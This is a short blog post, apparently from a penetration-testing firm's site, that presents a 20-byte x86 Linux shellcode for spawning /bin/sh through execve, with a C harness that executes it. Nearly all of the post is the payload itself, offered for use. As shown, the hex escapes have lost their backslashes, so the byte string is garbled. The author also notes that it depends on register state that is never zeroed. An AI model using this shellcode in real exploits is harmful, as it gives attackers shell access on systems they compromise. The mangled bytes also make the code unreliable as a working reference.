20 Bytes “/bin/sh” Shellcode

Akhirnya… Shellcode pertama… 😀

/*
Name    : 20 bytes "/bin/sh" shellcode - execve(/bin/sh,..,..)
Info    : this shell workout without zeroing registers it used first (eax,ebx,ecx)
Author  : otoy
Blog    : http://otoyrood.wordpress.com
Date    : August 2010
Tested on: ubuntu 8.04 & Backtrack 4
*/

#include <stdio.h>

char shellcode[] =
"xebx06"                     /* jmp    8048068 */
"x5b"                        /* pop    %ebx */
"x8dx41x0b"                  /* lea    0xb(%ecx),%eax */
"xcdx80"                     /* int    $0x80 */
"xe8xf5xffxffxff"  	     /* call   8048062 */
"x2f"                        /* das */
"x62x69x6e"                  /* bound  %ebp,0x6e(%ecx) */
"x2f"                        /* das */
"x73x68";                    /* jae    80480dc  */

int main(void)
{
                fprintf(stdout,"[*] Shellcode length: %dn",strlen(shellcode));
                ((void (*)(void)) shellcode)();

                return 0;
}

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About Spentera

We are specializing in penetration test, vulnerability assessment, computer forensics, as well as intrusion analyst and malware analysis. Customers can contact us directly at contact[at]spentera[dot]id, or use Contact Our Team menu on the sidebar.